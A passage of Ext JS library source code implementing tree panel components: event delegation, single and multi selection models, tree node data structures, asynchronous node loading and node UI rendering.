var c = Ext.fly(a, "_treeEvents").getAttribute("tree-node-id", "ext");
if (c) {
return this.tree.getNodeById(c)
}
}
return null
}, getNodeTarget:function (b) {
var a = b.getTarget(".x-tree-node-icon", 1);
if (!a) {
a = b.getTarget(".x-tree-node-el", 6)
}
return a
}, delegateOut:function (b, a) {
if (!this.beforeEvent(b)) {
return
}
if (b.getTarget(".x-tree-ec-icon", 1)) {
var c = this.getNode(b);
this.onIconOut(b, c);
if (c == this.lastEcOver) {
delete this.lastEcOver
}
}
if ((a = this.getNodeTarget(b)) && !b.within(a, true)) {
this.onNodeOut(b, this.getNode(b))
}
}, delegateOver:function (b, a) {
if (!this.beforeEvent(b)) {
return
}
if (Ext.isGecko && !this.trackingDoc) {
Ext.getBody().on("mouseover", this.trackExit, this);
this.trackingDoc = true
}
if (this.lastEcOver) {
this.onIconOut(b, this.lastEcOver);
delete this.lastEcOver
}
if (b.getTarget(".x-tree-ec-icon", 1)) {
this.lastEcOver = this.getNode(b);
this.onIconOver(b, this.lastEcOver)
}
if (a = this.getNodeTarget(b)) {
this.onNodeOver(b, this.getNode(b))
}
}, trackExit:function (a) {
if (this.lastOverNode) {
if (this.lastOverNode.ui && !a.within(this.lastOverNode.ui.getEl())) {
this.onNodeOut(a, this.lastOverNode)
}
delete this.lastOverNode;
Ext.getBody().un("mouseover", this.trackExit, this);
this.trackingDoc = false
}
}, delegateClick:function (b, a) {
if (this.beforeEvent(b)) {
if (b.getTarget("input[type=checkbox]", 1)) {
this.onCheckboxClick(b, this.getNode(b))
} else {
if (b.getTarget(".x-tree-ec-icon", 1)) {
this.onIconClick(b, this.getNode(b))
} else {
if (this.getNodeTarget(b)) {
this.onNodeClick(b, this.getNode(b))
}
}
}
} else {
this.checkContainerEvent(b, "click")
}
}, delegateDblClick:function (b, a) {
if (this.beforeEvent(b)) {
if (this.getNodeTarget(b)) {
this.onNodeDblClick(b, this.getNode(b))
}
} else {
this.checkContainerEvent(b, "dblclick")
}
}, delegateContextMenu:function (b, a) {
if (this.beforeEvent(b)) {
if (this.getNodeTarget(b)) {
this.onNodeContextMenu(b, this.getNode(b))
}
} else {
this.checkContainerEvent(b, "contextmenu")
}
}, checkContainerEvent:function (b, a) {
if (this.disabled) {
b.stopEvent();
return false
}
this.onContainerEvent(b, a)
}, onContainerEvent:function (b, a) {
this.tree.fireEvent("container" + a, this.tree, b)
}, onNodeClick:function (b, a) {
a.ui.onClick(b)
}, onNodeOver:function (b, a) {
this.lastOverNode = a;
a.ui.onOver(b)
}, onNodeOut:function (b, a) {
a.ui.onOut(b)
}, onIconOver:function (b, a) {
a.ui.addClass("x-tree-ec-over")
}, onIconOut:function (b, a) {
a.ui.removeClass("x-tree-ec-over")
}, onIconClick:function (b, a) {
a.ui.ecClick(b)
}, onCheckboxClick:function (b, a) {
a.ui.onCheckChange(b)
}, onNodeDblClick:function (b, a) {
a.ui.onDblClick(b)
}, onNodeContextMenu:function (b, a) {
a.ui.onContextMenu(b)
}, beforeEvent:function (b) {
var a = this.getNode(b);
if (this.disabled || !a || !a.ui) {
b.stopEvent();
return false
}
return true
}, disable:function () {
this.disabled = true
}, enable:function () {
this.disabled = false
}};
Ext.tree.DefaultSelectionModel = Ext.extend(Ext.util.Observable, {constructor:function (a) {
this.selNode = null;
this.addEvents("selectionchange", "beforeselect");
Ext.apply(this, a);
Ext.tree.DefaultSelectionModel.superclass.constructor.call(this)
}, init:function (a) {
this.tree = a;
a.mon(a.getTreeEl(), "keydown", this.onKeyDown, this);
a.on("click", this.onNodeClick, this)
}, onNodeClick:function (a, b) {
this.select(a)
}, select:function (c, a) {
if (!Ext.fly(c.ui.wrap).isVisible() && a) {
return a.call(this, c)
}
var b = this.selNode;
if (c == b) {
c.ui.onSelectedChange(true)
} else {
if (this.fireEvent("beforeselect", this, c, b) !== false) {
if (b && b.ui) {
b.ui.onSelectedChange(false)
}
this.selNode = c;
c.ui.onSelectedChange(true);
this.fireEvent("selectionchange", this, c, b)
}
}
return c
}, unselect:function (b, a) {
if (this.selNode == b) {
this.clearSelections(a)
}
}, clearSelections:function (a) {
var b = this.selNode;
if (b) {
b.ui.onSelectedChange(false);
this.selNode = null;
if (a !== true) {
this.fireEvent("selectionchange", this, null)
}
}
return b
}, getSelectedNode:function () {
return this.selNode
}, isSelected:function (a) {
return this.selNode == a
}, selectPrevious:function (a) {
if (!(a = a || this.selNode || this.lastSelNode)) {
return null
}
var c = a.previousSibling;
if (c) {
if (!c.isExpanded() || c.childNodes.length < 1) {
return this.select(c, this.selectPrevious)
} else {
var b = c.lastChild;
while (b && b.isExpanded() && Ext.fly(b.ui.wrap).isVisible() && b.childNodes.length > 0) {
b = b.lastChild
}
return this.select(b, this.selectPrevious)
}
} else {
if (a.parentNode && (this.tree.rootVisible || !a.parentNode.isRoot)) {
return this.select(a.parentNode, this.selectPrevious)
}
}
return null
}, selectNext:function (b) {
if (!(b = b || this.selNode || this.lastSelNode)) {
return null
}
if (b.firstChild && b.isExpanded() && Ext.fly(b.ui.wrap).isVisible()) {
return this.select(b.firstChild, this.selectNext)
} else {
if (b.nextSibling) {
return this.select(b.nextSibling, this.selectNext)
} else {
if (b.parentNode) {
var a = null;
b.parentNode.bubble(function () {
if (this.nextSibling) {
a = this.getOwnerTree().selModel.select(this.nextSibling, this.selectNext);
return false
}
});
return a
}
}
}
return null
}, onKeyDown:function (c) {
var b = this.selNode || this.lastSelNode;
var d = this;
if (!b) {
return
}
var a = c.getKey();
switch (a) {
case c.DOWN:
c.stopEvent();
this.selectNext();
break;
case c.UP:
c.stopEvent();
this.selectPrevious();
break;
case c.RIGHT:
c.preventDefault();
if (b.hasChildNodes()) {
if (!b.isExpanded()) {
b.expand()
} else {
if (b.firstChild) {
this.select(b.firstChild, c)
}
}
}
break;
case c.LEFT:
c.preventDefault();
if (b.hasChildNodes() && b.isExpanded()) {
b.collapse()
} else {
if (b.parentNode && (this.tree.rootVisible || b.parentNode != this.tree.getRootNode())) {
this.select(b.parentNode, c)
}
}
break
}
}});
Ext.tree.MultiSelectionModel = Ext.extend(Ext.util.Observable, {constructor:function (a) {
this.selNodes = [];
this.selMap = {};
this.addEvents("selectionchange");
Ext.apply(this, a);
Ext.tree.MultiSelectionModel.superclass.constructor.call(this)
}, init:function (a) {
this.tree = a;
a.mon(a.getTreeEl(), "keydown", this.onKeyDown, this);
a.on("click", this.onNodeClick, this)
}, onNodeClick:function (a, b) {
if (b.ctrlKey && this.isSelected(a)) {
this.unselect(a)
} else {
this.select(a, b, b.ctrlKey)
}
}, select:function (a, c, b) {
if (b !== true) {
this.clearSelections(true)
}
if (this.isSelected(a)) {
this.lastSelNode = a;
return a
}
this.selNodes.push(a);
this.selMap[a.id] = a;
this.lastSelNode = a;
a.ui.onSelectedChange(true);
this.fireEvent("selectionchange", this, this.selNodes);
return a
}, unselect:function (b) {
if (this.selMap[b.id]) {
b.ui.onSelectedChange(false);
var c = this.selNodes;
var a = c.indexOf(b);
if (a != -1) {
this.selNodes.splice(a, 1)
}
delete this.selMap[b.id];
this.fireEvent("selectionchange", this, this.selNodes)
}
}, clearSelections:function (b) {
var d = this.selNodes;
if (d.length > 0) {
for (var c = 0, a = d.length; c < a; c++) {
d[c].ui.onSelectedChange(false)
}
this.selNodes = [];
this.selMap = {};
if (b !== true) {
this.fireEvent("selectionchange", this, this.selNodes)
}
}
}, isSelected:function (a) {
return this.selMap[a.id] ? true : false
}, getSelectedNodes:function () {
return this.selNodes.concat([])
}, onKeyDown:Ext.tree.DefaultSelectionModel.prototype.onKeyDown, selectNext:Ext.tree.DefaultSelectionModel.prototype.selectNext, selectPrevious:Ext.tree.DefaultSelectionModel.prototype.selectPrevious});
Ext.data.Tree = Ext.extend(Ext.util.Observable, {constructor:function (a) {
this.nodeHash = {};
this.root = null;
if (a) {
this.setRootNode(a)
}
this.addEvents("append", "remove", "move", "insert", "beforeappend", "beforeremove", "beforemove", "beforeinsert");
Ext.data.Tree.superclass.constructor.call(this)
}, pathSeparator:"/", proxyNodeEvent:function () {
return this.fireEvent.apply(this, arguments)
}, getRootNode:function () {
return this.root
}, setRootNode:function (a) {
this.root = a;
a.ownerTree = this;
a.isRoot = true;
this.registerNode(a);
return a
}, getNodeById:function (a) {
return this.nodeHash[a]
}, registerNode:function (a) {
this.nodeHash[a.id] = a
}, unregisterNode:function (a) {
delete this.nodeHash[a.id]
}, toString:function () {
return"[Tree" + (this.id ? " " + this.id : "") + "]"
}});
Ext.data.Node = Ext.extend(Ext.util.Observable, {constructor:function (a) {
this.attributes = a || {};
this.leaf = this.attributes.leaf;
this.id = this.attributes.id;
if (!this.id) {
this.id = Ext.id(null, "xnode-");
this.attributes.id = this.id
}
this.childNodes = [];
this.parentNode = null;
this.firstChild = null;
this.lastChild = null;
this.previousSibling = null;
this.nextSibling = null;
this.addEvents({append:true, remove:true, move:true, insert:true, beforeappend:true, beforeremove:true, beforemove:true, beforeinsert:true});
this.listeners = this.attributes.listeners;
Ext.data.Node.superclass.constructor.call(this)
}, fireEvent:function (b) {
if (Ext.data.Node.superclass.fireEvent.apply(this, arguments) === false) {
return false
}
var a = this.getOwnerTree();
if (a) {
if (a.proxyNodeEvent.apply(a, arguments) === false) {
return false
}
}
return true
}, isLeaf:function () {
return this.leaf === true
}, setFirstChild:function (a) {
this.firstChild = a
}, setLastChild:function (a) {
this.lastChild = a
}, isLast:function () {
return(!this.parentNode ? true : this.parentNode.lastChild == this)
}, isFirst:function () {
return(!this.parentNode ? true : this.parentNode.firstChild == this)
}, hasChildNodes:function () {
return !this.isLeaf() && this.childNodes.length > 0
}, isExpandable:function () {
return this.attributes.expandable || this.hasChildNodes()
}, appendChild:function (e) {
var g = false;
if (Ext.isArray(e)) {
g = e
} else {
if (arguments.length > 1) {
g = arguments
}
}
if (g) {
for (var d = 0, a = g.length; d < a; d++) {
this.appendChild(g[d])
}
} else {
if (this.fireEvent("beforeappend", this.ownerTree, this, e) === false) {
return false
}
var b = this.childNodes.length;
var c = e.parentNode;
if (c) {
if (e.fireEvent("beforemove", e.getOwnerTree(), e, c, this, b) === false) {
return false
}
c.removeChild(e)
}
b = this.childNodes.length;
if (b === 0) {
this.setFirstChild(e)
}
this.childNodes.push(e);
e.parentNode = this;
var h = this.childNodes[b - 1];
if (h) {
e.previousSibling = h;
h.nextSibling = e
} else {
e.previousSibling = null
}
e.nextSibling = null;
this.setLastChild(e);
e.setOwnerTree(this.getOwnerTree());
this.fireEvent("append", this.ownerTree, this, e, b);
if (c) {
e.fireEvent("move", this.ownerTree, e, c, this, b)
}
return e
}
}, removeChild:function (c, b) {
var a = this.childNodes.indexOf(c);
if (a == -1) {
return false
}
if (this.fireEvent("beforeremove", this.ownerTree, this, c) === false) {
return false
}
this.childNodes.splice(a, 1);
if (c.previousSibling) {
c.previousSibling.nextSibling = c.nextSibling
}
if (c.nextSibling) {
c.nextSibling.previousSibling = c.previousSibling
}
if (this.firstChild == c) {
this.setFirstChild(c.nextSibling)
}
if (this.lastChild == c) {
this.setLastChild(c.previousSibling)
}
this.fireEvent("remove", this.ownerTree, this, c);
if (b) {
c.destroy(true)
} else {
c.clear()
}
return c
}, clear:function (a) {
this.setOwnerTree(null, a);
this.parentNode = this.previousSibling = this.nextSibling = null;
if (a) {
this.firstChild = this.lastChild = null
}
}, destroy:function (a) {
if (a === true) {
this.purgeListeners();
this.clear(true);
Ext.each(this.childNodes, function (b) {
b.destroy(true)
});
this.childNodes = null
} else {
this.remove(true)
}
}, insertBefore:function (d, a) {
if (!a) {
return this.appendChild(d)
}
if (d == a) {
return false
}
if (this.fireEvent("beforeinsert", this.ownerTree, this, d, a) === false) {
return false
}
var b = this.childNodes.indexOf(a);
var c = d.parentNode;
var e = b;
if (c == this && this.childNodes.indexOf(d) < b) {
e--
}
if (c) {
if (d.fireEvent("beforemove", d.getOwnerTree(), d, c, this, b, a) === false) {
return false
}
c.removeChild(d)
}
if (e === 0) {
this.setFirstChild(d)
}
this.childNodes.splice(e, 0, d);
d.parentNode = this;
var g = this.childNodes[e - 1];
if (g) {
d.previousSibling = g;
g.nextSibling = d
} else {
d.previousSibling = null
}
d.nextSibling = a;
a.previousSibling = d;
d.setOwnerTree(this.getOwnerTree());
this.fireEvent("insert", this.ownerTree, this, d, a);
if (c) {
d.fireEvent("move", this.ownerTree, d, c, this, e, a)
}
return d
}, remove:function (a) {
if (this.parentNode) {
this.parentNode.removeChild(this, a)
}
return this
}, removeAll:function (a) {
var c = this.childNodes, b;
while ((b = c[0])) {
this.removeChild(b, a)
}
return this
}, item:function (a) {
return this.childNodes[a]
}, replaceChild:function (a, c) {
var b = c ? c.nextSibling : null;
this.removeChild(c);
this.insertBefore(a, b);
return c
}, indexOf:function (a) {
return this.childNodes.indexOf(a)
}, getOwnerTree:function () {
if (!this.ownerTree) {
var a = this;
while (a) {
if (a.ownerTree) {
this.ownerTree = a.ownerTree;
break
}
a = a.parentNode
}
}
return this.ownerTree
}, getDepth:function () {
var b = 0;
var a = this;
while (a.parentNode) {
++b;
a = a.parentNode
}
return b
}, setOwnerTree:function (a, b) {
if (a != this.ownerTree) {
if (this.ownerTree) {
this.ownerTree.unregisterNode(this)
}
this.ownerTree = a;
if (b !== true) {
Ext.each(this.childNodes, function (c) {
c.setOwnerTree(a)
})
}
if (a) {
a.registerNode(this)
}
}
}, setId:function (b) {
if (b !== this.id) {
var a = this.ownerTree;
if (a) {
a.unregisterNode(this)
}
this.id = this.attributes.id = b;
if (a) {
a.registerNode(this)
}
this.onIdChange(b)
}
}, onIdChange:Ext.emptyFn, getPath:function (c) {
c = c || "id";
var e = this.parentNode;
var a = [this.attributes[c]];
while (e) {
a.unshift(e.attributes[c]);
e = e.parentNode
}
var d = this.getOwnerTree().pathSeparator;
return d + a.join(d)
}, bubble:function (c, b, a) {
var d = this;
while (d) {
if (c.apply(b || d, a || [d]) === false) {
break
}
d = d.parentNode
}
}, cascade:function (g, e, b) {
if (g.apply(e || this, b || [this]) !== false) {
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
d[c].cascade(g, e, b)
}
}
}, eachChild:function (g, e, b) {
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
if (g.apply(e || d[c], b || [d[c]]) === false) {
break
}
}
}, findChild:function (b, c, a) {
return this.findChildBy(function () {
return this.attributes[b] == c
}, null, a)
}, findChildBy:function (h, g, b) {
var e = this.childNodes, a = e.length, d = 0, j, c;
for (; d < a; d++) {
j = e[d];
if (h.call(g || j, j) === true) {
return j
} else {
if (b) {
c = j.findChildBy(h, g, b);
if (c != null) {
return c
}
}
}
}
return null
}, sort:function (e, d) {
var c = this.childNodes;
var a = c.length;
if (a > 0) {
var g = d ? function () {
e.apply(d, arguments)
} : e;
c.sort(g);
for (var b = 0; b < a; b++) {
var h = c[b];
h.previousSibling = c[b - 1];
h.nextSibling = c[b + 1];
if (b === 0) {
this.setFirstChild(h)
}
if (b == a - 1) {
this.setLastChild(h)
}
}
}
}, contains:function (a) {
return a.isAncestor(this)
}, isAncestor:function (a) {
var b = this.parentNode;
while (b) {
if (b == a) {
return true
}
b = b.parentNode
}
return false
}, toString:function () {
return"[Node" + (this.id ? " " + this.id : "") + "]"
}});
Ext.tree.TreeNode = Ext.extend(Ext.data.Node, {constructor:function (a) {
a = a || {};
if (Ext.isString(a)) {
a = {text:a}
}
this.childrenRendered = false;
this.rendered = false;
Ext.tree.TreeNode.superclass.constructor.call(this, a);
this.expanded = a.expanded === true;
this.isTarget = a.isTarget !== false;
this.draggable = a.draggable !== false && a.allowDrag !== false;
this.allowChildren = a.allowChildren !== false && a.allowDrop !== false;
this.text = a.text;
this.disabled = a.disabled === true;
this.hidden = a.hidden === true;
this.addEvents("textchange", "beforeexpand", "beforecollapse", "expand", "disabledchange", "collapse", "beforeclick", "click", "checkchange", "beforedblclick", "dblclick", "contextmenu", "beforechildrenrendered");
var b = this.attributes.uiProvider || this.defaultUI || Ext.tree.TreeNodeUI;
this.ui = new b(this)
}, preventHScroll:true, isExpanded:function () {
return this.expanded
}, getUI:function () {
return this.ui
}, getLoader:function () {
var a;
return this.loader || ((a = this.getOwnerTree()) && a.loader ? a.loader : (this.loader = new Ext.tree.TreeLoader()))
}, setFirstChild:function (a) {
var b = this.firstChild;
Ext.tree.TreeNode.superclass.setFirstChild.call(this, a);
if (this.childrenRendered && b && a != b) {
b.renderIndent(true, true)
}
if (this.rendered) {
this.renderIndent(true, true)
}
}, setLastChild:function (b) {
var a = this.lastChild;
Ext.tree.TreeNode.superclass.setLastChild.call(this, b);
if (this.childrenRendered && a && b != a) {
a.renderIndent(true, true)
}
if (this.rendered) {
this.renderIndent(true, true)
}
}, appendChild:function (b) {
if (!b.render && !Ext.isArray(b)) {
b = this.getLoader().createNode(b)
}
var a = Ext.tree.TreeNode.superclass.appendChild.call(this, b);
if (a && this.childrenRendered) {
a.render()
}
this.ui.updateExpandIcon();
return a
}, removeChild:function (b, a) {
this.ownerTree.getSelectionModel().unselect(b);
Ext.tree.TreeNode.superclass.removeChild.apply(this, arguments);
if (!a) {
var c = b.ui.rendered;
if (c) {
b.ui.remove()
}
if (c && this.childNodes.length < 1) {
this.collapse(false, false)
} else {
this.ui.updateExpandIcon()
}
if (!this.firstChild && !this.isHiddenRoot()) {
this.childrenRendered = false
}
}
return b
}, insertBefore:function (c, a) {
if (!c.render) {
c = this.getLoader().createNode(c)
}
var b = Ext.tree.TreeNode.superclass.insertBefore.call(this, c, a);
if (b && a && this.childrenRendered) {
c.render()
}
this.ui.updateExpandIcon();
return b
}, setText:function (b) {
var a = this.text;
this.text = this.attributes.text = b;
if (this.rendered) {
this.ui.onTextChange(this, b, a)
}
this.fireEvent("textchange", this, b, a)
}, setIconCls:function (b) {
var a = this.attributes.iconCls;
this.attributes.iconCls = b;
if (this.rendered) {
this.ui.onIconClsChange(this, b, a)
}
}, setTooltip:function (a, b) {
this.attributes.qtip = a;
this.attributes.qtipTitle = b;
if (this.rendered) {
this.ui.onTipChange(this, a, b)
}
}, setIcon:function (a) {
this.attributes.icon = a;
if (this.rendered) {
this.ui.onIconChange(this, a)
}
}, setHref:function (a, b) {
this.attributes.href = a;
this.attributes.hrefTarget = b;
if (this.rendered) {
this.ui.onHrefChange(this, a, b)
}
}, setCls:function (b) {
var a = this.attributes.cls;
this.attributes.cls = b;
if (this.rendered) {
this.ui.onClsChange(this, b, a)
}
}, select:function () {
var a = this.getOwnerTree();
if (a) {
a.getSelectionModel().select(this)
}
}, unselect:function (a) {
var b = this.getOwnerTree();
if (b) {
b.getSelectionModel().unselect(this, a)
}
}, isSelected:function () {
var a = this.getOwnerTree();
return a ? a.getSelectionModel().isSelected(this) : false
}, expand:function (a, c, d, b) {
if (!this.expanded) {
if (this.fireEvent("beforeexpand", this, a, c) === false) {
return
}
if (!this.childrenRendered) {
this.renderChildren()
}
this.expanded = true;
if (!this.isHiddenRoot() && (this.getOwnerTree().animate && c !== false) || c) {
this.ui.animExpand(function () {
this.fireEvent("expand", this);
this.runCallback(d, b || this, [this]);
if (a === true) {
this.expandChildNodes(true, true)
}
}.createDelegate(this));
return
} else {
this.ui.expand();
this.fireEvent("expand", this);
this.runCallback(d, b || this, [this])
}
} else {
this.runCallback(d, b || this, [this])
}
if (a === true) {
this.expandChildNodes(true)
}
}, runCallback:function (a, c, b) {
if (Ext.isFunction(a)) {
a.apply(c, b)
}
}, isHiddenRoot:function () {
return this.isRoot && !this.getOwnerTree().rootVisible
}, collapse:function (b, g, h, e) {
if (this.expanded && !this.isHiddenRoot()) {
if (this.fireEvent("beforecollapse", this, b, g) === false) {
return
}
this.expanded = false;
if ((this.getOwnerTree().animate && g !== false) || g) {
this.ui.animCollapse(function () {
this.fireEvent("collapse", this);
this.runCallback(h, e || this, [this]);
if (b === true) {
this.collapseChildNodes(true)
}
}.createDelegate(this));
return
} else {
this.ui.collapse();
this.fireEvent("collapse", this);
this.runCallback(h, e || this, [this])
}
} else {
if (!this.expanded) {
this.runCallback(h, e || this, [this])
}
}
if (b === true) {
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
d[c].collapse(true, false)
}
}
}, delayedExpand:function (a) {
if (!this.expandProcId) {
this.expandProcId = this.expand.defer(a, this)
}
}, cancelExpand:function () {
if (this.expandProcId) {
clearTimeout(this.expandProcId)
}
this.expandProcId = false
}, toggle:function () {
if (this.expanded) {
this.collapse()
} else {
this.expand()
}
}, ensureVisible:function (c, b) {
var a = this.getOwnerTree();
a.expandPath(this.parentNode ? this.parentNode.getPath() : this.getPath(), false, function () {
var d = a.getNodeById(this.id);
a.getTreeEl().scrollChildIntoView(d.ui.anchor);
this.runCallback(c, b || this, [this])
}.createDelegate(this))
}, expandChildNodes:function (b, e) {
var d = this.childNodes, c, a = d.length;
for (c = 0; c < a; c++) {
d[c].expand(b, e)
}
}, collapseChildNodes:function (b) {
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
d[c].collapse(b)
}
}, disable:function () {
this.disabled = true;
this.unselect();
if (this.rendered && this.ui.onDisableChange) {
this.ui.onDisableChange(this, true)
}
this.fireEvent("disabledchange", this, true)
}, enable:function () {
this.disabled = false;
if (this.rendered && this.ui.onDisableChange) {
this.ui.onDisableChange(this, false)
}
this.fireEvent("disabledchange", this, false)
}, renderChildren:function (b) {
if (b !== false) {
this.fireEvent("beforechildrenrendered", this)
}
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
d[c].render(true)
}
this.childrenRendered = true
}, sort:function (e, d) {
Ext.tree.TreeNode.superclass.sort.apply(this, arguments);
if (this.childrenRendered) {
var c = this.childNodes;
for (var b = 0, a = c.length; b < a; b++) {
c[b].render(true)
}
}
}, render:function (a) {
this.ui.render(a);
if (!this.rendered) {
this.getOwnerTree().registerNode(this);
this.rendered = true;
if (this.expanded) {
this.expanded = false;
this.expand(false, false)
}
}
}, renderIndent:function (b, e) {
if (e) {
this.ui.childIndent = null
}
this.ui.renderIndent();
if (b === true && this.childrenRendered) {
var d = this.childNodes;
for (var c = 0, a = d.length; c < a; c++) {
d[c].renderIndent(true, e)
}
}
}, beginUpdate:function () {
this.childrenRendered = false
}, endUpdate:function () {
if (this.expanded && this.rendered) {
this.renderChildren()
}
}, destroy:function (a) {
if (a === true) {
this.unselect(true)
}
Ext.tree.TreeNode.superclass.destroy.call(this, a);
Ext.destroy(this.ui, this.loader);
this.ui = this.loader = null
}, onIdChange:function (a) {
this.ui.onIdChange(a)
}});
Ext.tree.TreePanel.nodeTypes.node = Ext.tree.TreeNode;
Ext.tree.AsyncTreeNode = function (a) {
this.loaded = a && a.loaded === true;
this.loading = false;
Ext.tree.AsyncTreeNode.superclass.constructor.apply(this, arguments);
this.addEvents("beforeload", "load")
};
Ext.extend(Ext.tree.AsyncTreeNode, Ext.tree.TreeNode, {expand:function (b, e, h, c) {
if (this.loading) {
var g;
var d = function () {
if (!this.loading) {
clearInterval(g);
this.expand(b, e, h, c)
}
}.createDelegate(this);
g = setInterval(d, 200);
return
}
if (!this.loaded) {
if (this.fireEvent("beforeload", this) === false) {
return
}
this.loading = true;
this.ui.beforeLoad(this);
var a = this.loader || this.attributes.loader || this.getOwnerTree().getLoader();
if (a) {
a.load(this, this.loadComplete.createDelegate(this, [b, e, h, c]), this);
return
}
}
Ext.tree.AsyncTreeNode.superclass.expand.call(this, b, e, h, c)
}, isLoading:function () {
return this.loading
}, loadComplete:function (a, c, d, b) {
this.loading = false;
this.loaded = true;
this.ui.afterLoad(this);
this.fireEvent("load", this);
this.expand(a, c, d, b)
}, isLoaded:function () {
return this.loaded
}, hasChildNodes:function () {
if (!this.isLeaf() && !this.loaded) {
return true
} else {
return Ext.tree.AsyncTreeNode.superclass.hasChildNodes.call(this)
}
}, reload:function (b, a) {
this.collapse(false, false);
while (this.firstChild) {
this.removeChild(this.firstChild).destroy()
}
this.childrenRendered = false;
this.loaded = false;
if (this.isHiddenRoot()) {
this.expanded = false
}
this.expand(false, false, b, a)
}});
Ext.tree.TreePanel.nodeTypes.async = Ext.tree.AsyncTreeNode;
Ext.tree.TreeNodeUI = Ext.extend(Object, {constructor:function (a) {
Ext.apply(this, {node:a, rendered:false, animating:false, wasLeaf:true, ecc:"x-tree-ec-icon x-tree-elbow", emptyIcon:Ext.BLANK_IMAGE_URL})
}, removeChild:function (a) {
if (this.rendered) {
this.ctNode.removeChild(a.ui.getEl())
}
}, beforeLoad:function () {
this.addClass("x-tree-node-loading")
}, afterLoad:function () {
this.removeClass("x-tree-node-loading")
}, onTextChange:function (b, c, a) {
if (this.rendered) {
this.textNode.innerHTML = c
}
}, onIconClsChange:function (c, a, b) {
if (this.rendered) {
Ext.fly(this.iconNode).replaceClass(b, a)
}
}, onIconChange:function (b, a) {
if (this.rendered) {
var c = Ext.isEmpty(a);
this.iconNode.src = c ? this.emptyIcon : a;
Ext.fly(this.iconNode)[c ? "removeClass" : "addClass"]("x-tree-node-inline-icon")
}
}, onTipChange:function (b, c, d) {
if (this.rendered) {
var a = Ext.isDefined(d);
if (this.textNode.setAttributeNS) {
this.textNode.setAttributeNS("ext", "qtip", c);
if (a) {
this.textNode.setAttributeNS("ext", "qtitle", d)
}
} else {
this.textNode.setAttribute("ext:qtip", c);
if (a) {
this.textNode.setAttribute("ext:qtitle", d)
}
}
}
}, onHrefChange:function (b, a, c) {
if (this.rendered) {
this.anchor.href = this.getHref(a);
if (Ext.isDefined(c)) {
this.anchor.target = c
}
}
}, onClsChange:function (c, a, b) {
if (this.rendered) {
Ext.fly(this.elNode).replaceClass(b, a)
}
}, onDisableChange:function (a, b) {
this.disabled = b;
if (this.checkbox) {
this.checkbox.disabled = b
}
this[b ? "addClass" : "removeClass"]("x-tree-node-disabled")
}, onSelectedChange:function (a) {
if (a) {
this.focus();
this.addClass("x-tree-selected")
} else {
this.removeClass("x-tree-selected")
}
}, onMove:function (a, h, e, g, d, b) {
this.childIndent = null;
if (this.rendered) {
var i = g.ui.getContainer();
if (!i) {
this.holder = document.createElement("div");
this.holder.appendChild(this.wrap);
return
}
var c = b ? b.ui.getEl() : null;
if (c) {
i.insertBefore(this.wrap, c)
} else {
i.appendChild(this.wrap)
}
this.node.renderIndent(true, e != g)
}
}, addClass:function (a) {
if (this.elNode) {
Ext.fly(this.elNode).addClass(a)
}
}, removeClass:function (a) {
if (this.elNode) {
Ext.fly(this.elNode).removeClass(a)
}
}, remove:function () {
if (this.rendered) {
this.holder = document.createElement("div");
this.holder.appendChild(this.wrap)
}
}, fireEvent:function () {
return this.node.fireEvent.apply(this.node, arguments)
}, initEvents:function () {
this.node.on("move", this.onMove, this);
if (this.node.disabled) {
this.onDisableChange(this.node, true)
}
if (this.node.hidden) {
this.hide()
}
var b = this.node.getOwnerTree();
var a = b.enableDD || b.enableDrag || b.enableDrop;
if (a && (!this.node.isRoot || b.rootVisible)) {
Ext.dd.Registry.register(this.elNode, {node:this.node, handles:this.getDDHandles(), isHandle:false})
}
}, getDDHandles:function () {
return[this.iconNode, this.textNode, this.elNode]
}, hide:function () {
this.node.hidden = true;
if (this.wrap) {
this.wrap.style.display = "none"
}
}, show:function () {
this.node.hidden = false;
if (this.wrap) {
this.wrap.style.display = ""
}
}, onContextMenu:function (a) {
if (this.node.hasListener("contextmenu") || this.node.getOwnerTree().hasListener("contextmenu")) {
a.preventDefault();
this.focus();
this.fireEvent("contextmenu", this.node, a)
}
}, onClick:function (c) {
if (this.dropping) {
c.stopEvent();
return
}
if (this.fireEvent("beforeclick", this.node, c) !== false) {
var b = c.getTarget("a");
if (!this.disabled && this.node.attributes.href && b) {
this.fireEvent("click", this.node, c);
return
} else {
if (b && c.ctrlKey) {
c.stopEvent()
}
}
c.preventDefault();
if (this.disabled) {
return
}
if (this.node.attributes.singleClickExpand && !this.animating && this.node.isExpandable()) {
this.node.toggle()
}
this.fireEvent("click", this.node, c)
} else {
c.stopEvent()
}
}, onDblClick:function (a) {
a.preventDefault();
if (this.disabled) {
return
}
if (this.fireEvent("beforedblclick", this.node, a) !== false) {
if (this.checkbox) {
this.toggleCheck()
}
if (!this.animating && this.node.isExpandable()) {
this.node.toggle()
}
this.fireEvent("dblclick", this.node, a)
}
}, onOver:function (a) {
this.addClass("x-tree-node-over")
}, onOut:function (a) {
this.removeClass("x-tree-node-over")
}, onCheckChange:function () {
var a = this.checkbox.checked;
this.checkbox.defaultChecked = a;
this.node.attributes.checked = a;
this.fireEvent("checkchange", this.node, a)
}, ecClick:function (a) {
if (!this.animating && this.node.isExpandable()) {
this.node.toggle()
}
}, startDrop:function () {
this.dropping = true
}, endDrop:function () {
setTimeout(function () {
this.dropping = false
}.createDelegate(this), 50)
}, expand:function () {
this.updateExpandIcon();
this.ctNode.style.display = ""
}, focus:function () {
if (!this.node.preventHScroll) {
try {
this.anchor.focus()
} catch (c) {
}
} else {
try {
var b = this.node.getOwnerTree().getTreeEl().dom;
var a = b.scrollLeft;
this.anchor.focus();
b.scrollLeft = a
} catch (c) {
}
}
}, toggleCheck:function (b) {
var a = this.checkbox;
if (a) {
a.checked = (b === undefined ? !a.checked : b);
this.onCheckChange()
}
}, blur:function () {
try {
this.anchor.blur()
} catch (a) {
}
}, animExpand:function (b) {
var a = Ext.get(this.ctNode);
a.stopFx();
if (!this.node.isExpandable()) {
this.updateExpandIcon();
this.ctNode.style.display = "";
Ext.callback(b);
return
}
this.animating = true;
this.updateExpandIcon();
a.slideIn("t", {callback:function () {
this.animating = false;
Ext.callback(b)
}, scope:this, duration:this.node.ownerTree.duration || 0.25})
}, highlight:function () {
var a = this.node.getOwnerTree();
Ext.fly(this.wrap).highlight(a.hlColor || "C3DAF9", {endColor:a.hlBaseColor})
}, collapse:function () {
this.updateExpandIcon();
